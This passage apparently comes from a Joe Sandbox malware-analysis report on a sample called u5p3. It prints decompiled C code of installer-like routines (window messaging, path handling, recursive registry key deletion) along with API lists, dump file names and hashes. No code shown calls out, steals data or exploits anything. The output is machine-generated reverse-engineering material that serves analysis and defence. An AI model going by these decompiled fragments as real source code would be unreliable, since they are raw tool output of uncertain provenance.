								L54:
								_t44 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t89 = _t44;
								L57:
								_t86 = _t84;
								L58:
								E10001470(_t84, _t89, _t86,  &_v76);
								E10001272( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t44 = 1;
								goto L55;
							}
							__eflags = _t89 - _t59;
							if(_t89 < _t59) {
								goto L47;
							}
							goto L54;
						}
						_t84 = _t86;
						_t44 = E10002D90(_t89, _t59, _t84);
						goto L56;
					}
					_t67 = _t65 - 1;
					__eflags = _t67;
					if(_t67 == 0) {
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							goto L54;
						}
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L54;
						}
						goto L47;
					}
					_t68 = _t67 - 1;
					__eflags = _t68;
					if(_t68 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
						if( *((short*)(_t43 + 2)) != 0x3e) {
							__eflags = _t86 - _v12;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t89 - _t59;
							if(_t89 <= _t59) {
								goto L54;
							}
							goto L47;
						}
						_t84 = _t86;
						_t44 = E10002DB0(_t89, _t59, _t84);
						goto L56;
					}
					_t70 = _t68 - 0x20;
					__eflags = _t70;
					if(_t70 == 0) {
						_t89 = _t89 ^ _t59;
						_t86 = _t86 ^ _v12;
						goto L58;
					}
					_t71 = _t70 - 0x1e;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
						if( *((short*)(_t43 + 2)) != 0x7c) {
							_t89 = _t89 | _t59;
							_t86 = _t86 | _v12;
							goto L58;
						}
						__eflags = _t89 | _t86;
						if((_t89 | _t86) != 0) {
							goto L47;
						}
						__eflags = _t59 | _v12;
						if((_t59 | _v12) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t71 == 0;
					if(_t71 == 0) {
						_t89 =  !_t89;
						_t86 =  !_t86;
					}
					goto L58;
				}
				if(_t100 == 0) {
					L21:
					__eflags = _t59 | _v12;
					if((_t59 | _v12) != 0) {
						_v24 = E10002C20(_t89, _t86, _t59, _v12);
						_v20 = _t84;
						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
						_t43 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t84 = _t86;
					}
					__eflags =  *_t43 - 0x2f;
					if( *_t43 != 0x2f) {
						goto L57;
					} else {
						_t89 = _v24;
						_t86 = _v20;
						goto L58;
					}
				}
				_t76 = _t64 - 0x21;
				if(_t76 == 0) {
					_t44 = 0;
					__eflags = _t89 | _t86;
					if((_t89 | _t86) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t77 = _t76 - 4;
				if(_t77 == 0) {
					goto L21;
				}
				_t78 = _t77 - 1;
				if(_t78 == 0) {
					__eflags =  *((short*)(_t43 + 2)) - 0x26;
					if( *((short*)(_t43 + 2)) != 0x26) {
						_t89 = _t89 & _t59;
						_t86 = _t86 & _v12;
						goto L58;
					}
					__eflags = _t89 | _t86;
					if((_t89 | _t86) == 0) {
						goto L54;
					}
					__eflags = _t59 | _v12;
					if((_t59 | _v12) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t79 = _t78 - 4;
				if(_t79 == 0) {
					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
					goto L56;
				} else {
					_t80 = _t79 - 1;
					if(_t80 == 0) {
						_t89 = _t89 + _t59;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t80 == 0) {
							_t89 = _t89 - _t59;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L58;
				}
			}



























                                                        0x100018a9
                                                        0x100018b3
                                                        0x100018bc
                                                        0x100018bf
                                                        0x100018c4
                                                        0x100018cd
                                                        0x100018d6
                                                        0x100018d8
                                                        0x100018da
                                                        0x100018df
                                                        0x100018e2
                                                        0x100018e9
                                                        0x100018f7
                                                        0x10001900
                                                        0x10001905
                                                        0x10001908
                                                        0x1000190e
                                                        0x1000190e
                                                        0x10001911
                                                        0x10001914
                                                        0x10001917
                                                        0x100019df
                                                        0x100019df
                                                        0x100019e2
                                                        0x10001a4d
                                                        0x10001a52
                                                        0x10001a61
                                                        0x10001a64
                                                        0x10001a6c
                                                        0x10001a6c
                                                        0x10001a6c
                                                        0x10001a6e
                                                        0x10001a6e
                                                        0x10001a6f
                                                        0x10001a6f
                                                        0x10001a71
                                                        0x10001a71
                                                        0x10001a73
                                                        0x10001a79
                                                        0x10001a82
                                                        0x10001a93
                                                        0x10001a9e
                                                        0x10001a9e
                                                        0x10001a66
                                                        0x10001a48
                                                        0x10001a48
                                                        0x10001a4a
                                                        0x10001a4a
                                                        0x00000000
                                                        0x10001a4a
                                                        0x10001a68
                                                        0x10001a6a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a6a
                                                        0x10001a56
                                                        0x10001a5a
                                                        0x00000000
                                                        0x10001a5a
                                                        0x100019e4
                                                        0x100019e4
                                                        0x100019e5
                                                        0x10001a3f
                                                        0x10001a41
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a43
                                                        0x10001a46
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a46
                                                        0x100019e7
                                                        0x100019e7
                                                        0x100019e8
                                                        0x10001a1e
                                                        0x10001a23
                                                        0x10001a32
                                                        0x10001a35
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a37
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a39
                                                        0x10001a3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a3d
                                                        0x10001a27
                                                        0x10001a2b
                                                        0x00000000
                                                        0x10001a2b
                                                        0x100019ea
                                                        0x100019ea
                                                        0x100019ed
                                                        0x10001a17
                                                        0x10001a19
                                                        0x00000000
                                                        0x10001a19
                                                        0x100019ef
                                                        0x100019ef
                                                        0x100019f2
                                                        0x100019fe
                                                        0x10001a03
                                                        0x10001a10
                                                        0x10001a12
                                                        0x00000000
                                                        0x10001a12
                                                        0x10001a05
                                                        0x10001a07
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a09
                                                        0x10001a0c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001a0e
                                                        0x100019f5
                                                        0x100019f6
                                                        0x100019f8
                                                        0x100019fa
                                                        0x100019fa
                                                        0x00000000
                                                        0x100019f6
                                                        0x1000191d
                                                        0x10001996
                                                        0x10001998
                                                        0x1000199b
                                                        0x100019b7
                                                        0x100019ba
                                                        0x100019c5
                                                        0x100019c7
                                                        0x1000199d
                                                        0x1000199d
                                                        0x100019a1
                                                        0x100019a5
                                                        0x100019a5
                                                        0x100019ca
                                                        0x100019ce
                                                        0x00000000
                                                        0x100019d4
                                                        0x100019d4
                                                        0x100019d7
                                                        0x00000000
                                                        0x100019d7
                                                        0x100019ce
                                                        0x1000191f
                                                        0x10001922
                                                        0x10001987
                                                        0x10001989
                                                        0x1000198b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001991
                                                        0x10001924
                                                        0x10001927
                                                        0x00000000
                                                        0x00000000
                                                        0x10001929
                                                        0x1000192a
                                                        0x10001960
                                                        0x10001965
                                                        0x1000197d
                                                        0x1000197f
                                                        0x00000000
                                                        0x1000197f
                                                        0x10001967
                                                        0x10001969
                                                        0x00000000
                                                        0x00000000
                                                        0x1000196f
                                                        0x10001972
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001978
                                                        0x1000192c
                                                        0x1000192f
                                                        0x10001956
                                                        0x00000000
                                                        0x10001931
                                                        0x10001931
                                                        0x10001932
                                                        0x10001946
                                                        0x10001948
                                                        0x10001934
                                                        0x10001936
                                                        0x1000193c
                                                        0x1000193e
                                                        0x1000193e
                                                        0x10001936
                                                        0x00000000
                                                        0x10001932

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FreeGlobal
                                                        • String ID:
                                                        • API String ID: 2979337801-0
                                                        • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                        • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                        • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                        • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                        0x00401d63
                                                        0x00401d6a
                                                        0x00401d99
                                                        0x00401da1
                                                        0x00401da8
                                                        0x00401da8
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 00401D5D
                                                        • GetClientRect.USER32 ref: 00401D6A
                                                        • LoadImageW.USER32 ref: 00401D8B
                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                        • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
                                                        • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                        • Opcode Fuzzy Hash: 111346f9e6b971423f1b2999124cafe5a37e4e10baee3c5636334ddbed451260
                                                        • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406193();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                        0x00401c19
                                                        0x00401c1b
                                                        0x00401c22
                                                        0x00401c25
                                                        0x00401c28
                                                        0x00401c32
                                                        0x00401c36
                                                        0x00401c39
                                                        0x00401c42
                                                        0x00401c42
                                                        0x00401c45
                                                        0x00401c49
                                                        0x00401c52
                                                        0x00401c52
                                                        0x00401c55
                                                        0x00401c59
                                                        0x00401c5b
                                                        0x00401cb0
                                                        0x00401cb2
                                                        0x00401cbd
                                                        0x00401cc7
                                                        0x00401cca
                                                        0x00401cca
                                                        0x00401cd3
                                                        0x00000000
                                                        0x00401c5d
                                                        0x00401c64
                                                        0x00401c66
                                                        0x00401c69
                                                        0x00401c6f
                                                        0x00401c76
                                                        0x00401c79
                                                        0x00401ca1
                                                        0x00401cd9
                                                        0x00401cd9
                                                        0x00401c7b
                                                        0x00401c89
                                                        0x00401c91
                                                        0x00401c94
                                                        0x00401c94
                                                        0x00401c79
                                                        0x00401cdc
                                                        0x00401cdf
                                                        0x00401ce5
                                                        0x00402a65
                                                        0x00402a65
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • SendMessageTimeoutW.USER32 ref: 00401C89
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                        • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                        • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                        • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405BC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405BC8(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B4A(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                        0x00405bd1
                                                        0x00405bd8
                                                        0x00405bdb
                                                        0x00405bdd
                                                        0x00405be3
                                                        0x00405bfb
                                                        0x00405c1d
                                                        0x00000000
                                                        0x00405c03
                                                        0x00405c05
                                                        0x00405c06
                                                        0x00405c09
                                                        0x00405c0a
                                                        0x00405c13
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c16
                                                        0x00405c19
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c19
                                                        0x00000000
                                                        0x00405c06
                                                        0x00405bf2
                                                        0x00000000
                                                        0x00405bf3

                                                        APIs
                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,?,7476FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 00405BD6
                                                        • CharNextW.USER32(00000000), ref: 00405BDB
                                                        • CharNextW.USER32(00000000), ref: 00405BF3
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsn12E4.tmp, xrefs: 00405BC9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsn12E4.tmp
                                                        • API String ID: 3213498283-2975371209
                                                        • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                        • Instruction ID: 71fcaf91f17ad0c61ae46c06a49b7004919c5bb89cc9bf949e59d58efb239cdc
                                                        • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                        • Instruction Fuzzy Hash: EAF09061914B2195EA3176544C45E7766BCEB96760B00807BE702B72C0EBB8A8C19FEE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00405B1D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                        0x00405b1e
                                                        0x00405b2b
                                                        0x00405b2c
                                                        0x00405b37
                                                        0x00405b3f
                                                        0x00405b3f
                                                        0x00405b47

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405B3F
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3081826266
                                                        • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                        • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                        • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                        • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E004060B9(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E00406626(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}











                                                        0x00402d35
                                                        0x00402d3e
                                                        0x00402d47
                                                        0x00402d53
                                                        0x00402d5a
                                                        0x00402d7e
                                                        0x00402d64
                                                        0x00402d66
                                                        0x00402db9
                                                        0x00000000
                                                        0x00402dc1
                                                        0x00402d75
                                                        0x00402d7a
                                                        0x00402d7c
                                                        0x00000000
                                                        0x00000000
                                                        0x00402d7c
                                                        0x00402d98
                                                        0x00402da0
                                                        0x00402da7
                                                        0x00000000
                                                        0x00402dca
                                                        0x00000000
                                                        0x00402db2
                                                        0x00402dd4

                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
